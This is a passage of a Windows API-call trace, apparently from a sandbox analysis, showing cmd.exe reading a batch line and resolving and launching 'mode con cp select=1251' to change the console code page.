cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0159.768] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.769] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.769] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c44, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0159.769] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.769] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.769] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c46, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0159.769] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.769] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.769] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c48, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0159.769] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.769] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.769] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0159.769] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.769] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.769] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0159.769] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.769] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.769] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.769] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c4e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0159.770] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.770] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.770] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c50, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0159.770] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.770] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.770] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c52, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0159.770] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.770] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.770] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c54, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0159.770] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.770] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.770] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c56, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0159.770] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.770] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.770] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.770] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c58, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0159.770] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.770] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.770] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.771] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0159.771] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.771] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.771] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.771] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0159.771] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.771] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.771] ReadFile (in: hFile=0x248, lpBuffer=0x7ff695349970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x4253cff6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesRead=0x4253cff6b8*=0x1, lpOverlapped=0x0) returned 1 [0159.771] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff695349970, cbMultiByte=1, lpWideCharStr=0x7ff695353c5e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0159.771] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.771] GetFileType (hFile=0x248) returned 0x3 [0159.772] _get_osfhandle (_FileHandle=0) returned 0x248 [0159.772] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.772] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.772] GetFileType (hFile=0x254) returned 0x3 [0159.772] _get_osfhandle (_FileHandle=1) returned 0x254 [0159.772] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x7ff695349970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0159.772] WriteFile (in: hFile=0x254, lpBuffer=0x7ff695349970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x4253cff658, lpOverlapped=0x0 | out: lpBuffer=0x7ff695349970*, lpNumberOfBytesWritten=0x4253cff658*=0x18, lpOverlapped=0x0) returned 1 [0159.772] GetProcessHeap () returned 0x1916fa10000 [0159.772] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x4012) returned 0x1916fa18e90 [0159.772] GetProcessHeap () returned 0x1916fa10000 [0159.772] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa18e90) returned 1 [0159.773] _wcsicmp (_String1="mode", _String2=")") returned 68 [0159.773] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0159.773] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0159.773] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0159.773] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0159.773] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0159.773] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0159.773] GetProcessHeap () returned 0x1916fa10000 [0159.773] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xb0) returned 0x1916fa177c0 [0159.773] GetProcessHeap () returned 0x1916fa10000 [0159.773] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1a) returned 0x1916fa16330 [0159.773] GetProcessHeap () returned 0x1916fa10000 [0159.773] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x38) returned 0x1916fa16500 [0159.774] GetConsoleOutputCP () returned 0x1b5 [0160.472] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff69534fbb0 | out: lpCPInfo=0x7ff69534fbb0) returned 1 [0160.472] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.833] GetConsoleTitleW (in: lpConsoleTitle=0x4253cff4a0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0161.063] malloc (_Size=0xffce) returned 0x1916fb30840 [0161.063] ??_V@YAXPEAX@Z () returned 0x1916fb30840 [0161.064] malloc (_Size=0xffce) returned 0x1916fb40820 [0161.064] ??_V@YAXPEAX@Z () returned 0x1916fb40820 [0161.064] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0161.064] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0161.064] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0161.064] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0161.065] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0161.065] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0161.065] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0161.065] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0161.065] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0161.065] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0161.065] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0161.065] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0161.065] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0161.065] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0161.065] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0161.065] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0161.065] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0161.065] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0161.065] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0161.065] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0161.065] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0161.065] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0161.065] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0161.065] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0161.065] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0161.065] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0161.065] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0161.065] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0161.065] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0161.065] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0161.065] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0161.065] _wcsicmp (_String1="mode", _String2="START") returned -6 [0161.065] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0161.065] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0161.065] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0161.065] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0161.066] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0161.066] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0161.066] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0161.066] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0161.066] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0161.066] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0161.066] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0161.066] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0161.066] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0161.066] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0161.066] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0161.066] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0161.066] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0161.066] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0161.066] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0161.066] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0161.066] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0161.066] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0161.066] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0161.066] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0161.066] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0161.066] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0161.066] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0161.066] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0161.066] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0161.066] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0161.066] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0161.066] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0161.066] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0161.067] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0161.067] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0161.067] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0161.067] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0161.067] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0161.067] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0161.067] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0161.067] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0161.067] _wcsicmp (_String1="mode", _String2="START") returned -6 [0161.067] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0161.067] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0161.067] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0161.067] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0161.067] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0161.067] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0161.067] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0161.067] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0161.067] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0161.067] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0161.067] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0161.067] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0161.067] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0161.068] ??_V@YAXPEAX@Z () returned 0x1 [0161.068] GetProcessHeap () returned 0x1916fa10000 [0161.068] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xffde) returned 0x1916fa18e90 [0161.068] GetProcessHeap () returned 0x1916fa10000 [0161.068] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x42) returned 0x1916fa17880 [0161.068] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0161.068] malloc (_Size=0xffce) returned 0x1916fb40820 [0161.068] ??_V@YAXPEAX@Z () returned 0x1916fb40820 [0161.069] GetProcessHeap () returned 0x1916fa10000 [0161.069] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1ffac) returned 0x1916fa28e80 [0161.070] SetErrorMode (uMode=0x0) returned 0x0 [0161.070] SetErrorMode (uMode=0x1) returned 0x0 [0161.070] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x1916fa28e90, lpFilePart=0x4253cfed20 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x4253cfed20*="system32") returned 0x13 [0161.070] SetErrorMode (uMode=0x0) returned 0x1 [0161.070] GetProcessHeap () returned 0x1916fa10000 [0161.070] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa28e80, Size=0x42) returned 0x1916fa28e80 [0161.070] GetProcessHeap () returned 0x1916fa10000 [0161.070] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa28e80) returned 0x42 [0161.070] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0161.070] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0161.071] GetProcessHeap () returned 0x1916fa10000 [0161.071] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x1b6) returned 0x1916fa178d0 [0161.071] GetProcessHeap () returned 0x1916fa10000 [0161.071] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x35c) returned 0x1916fa28ee0 [0161.081] GetProcessHeap () returned 0x1916fa10000 [0161.081] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa28ee0, Size=0x1b8) returned 0x1916fa28ee0 [0161.081] GetProcessHeap () returned 0x1916fa10000 [0161.081] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa28ee0) returned 0x1b8 [0161.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff69534bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.081] GetProcessHeap () returned 0x1916fa10000 [0161.081] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0xe8) returned 0x1916fa290b0 [0161.083] GetProcessHeap () returned 0x1916fa10000 [0161.083] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa290b0, Size=0x7e) returned 0x1916fa290b0 [0161.083] GetProcessHeap () returned 0x1916fa10000 [0161.083] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa290b0) returned 0x7e [0161.083] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.083] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x4253cfea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4253cfea90) returned 0x1916fa29140 [0161.084] GetProcessHeap () returned 0x1916fa10000 [0161.084] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x0, Size=0x28) returned 0x1916fa16540 [0161.084] FindClose (in: hFindFile=0x1916fa29140 | out: hFindFile=0x1916fa29140) returned 1 [0161.084] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x4253cfea90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4253cfea90) returned 0x1916fa29140 [0161.084] GetProcessHeap () returned 0x1916fa10000 [0161.084] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa16540, Size=0x8) returned 0x1916fa16540 [0161.084] FindClose (in: hFindFile=0x1916fa29140 | out: hFindFile=0x1916fa29140) returned 1 [0161.084] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0161.084] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0161.084] ??_V@YAXPEAX@Z () returned 0x1 [0161.084] GetConsoleTitleW (in: lpConsoleTitle=0x4253cff010, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0161.384] GetProcessHeap () returned 0x1916fa10000 [0161.384] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x21c) returned 0x1916fa29140 [0161.384] GetConsoleTitleW (in: lpConsoleTitle=0x1916fa29150, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0161.569] GetProcessHeap () returned 0x1916fa10000 [0161.569] RtlReAllocateHeap (Heap=0x1916fa10000, Flags=0x0, Ptr=0x1916fa29140, Size=0x8c) returned 0x1916fa29140 [0161.569] GetProcessHeap () returned 0x1916fa10000 [0161.569] RtlSizeHeap (HeapHandle=0x1916fa10000, Flags=0x0, MemoryPointer=0x1916fa29140) returned 0x8c [0161.569] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0161.853] GetProcessHeap () returned 0x1916fa10000 [0161.853] RtlFreeHeap (HeapHandle=0x1916fa10000, Flags=0x0, BaseAddress=0x1916fa29140) returned 1 [0161.853] InitializeProcThreadAttributeList (in: lpAttributeList=0x4253cfef30, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4253cfee20 | out: lpAttributeList=0x4253cfef30, lpSize=0x4253cfee20) returned 1 [0161.853] UpdateProcThreadAttribute (in: lpAttributeList=0x4253cfef30, dwFlags=0x0, Attribute=0x60001, lpValue=0x4253cfee0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4253cfef30, lpPreviousValue=0x0) returned 1 [0161.853] GetStartupInfoW (in: lpStartupInfo=0x4253cfeec0 | out: lpStartupInfo=0x4253cfeec0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0161.853] GetProcessHeap () returned 0x1916fa10000 [0161.854] RtlAllocateHeap (HeapHandle=0x1916fa10000, Flags=0x8, Size=0x20) returned 0x1916fa17610 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0161.854] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0161.855] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0161.855] 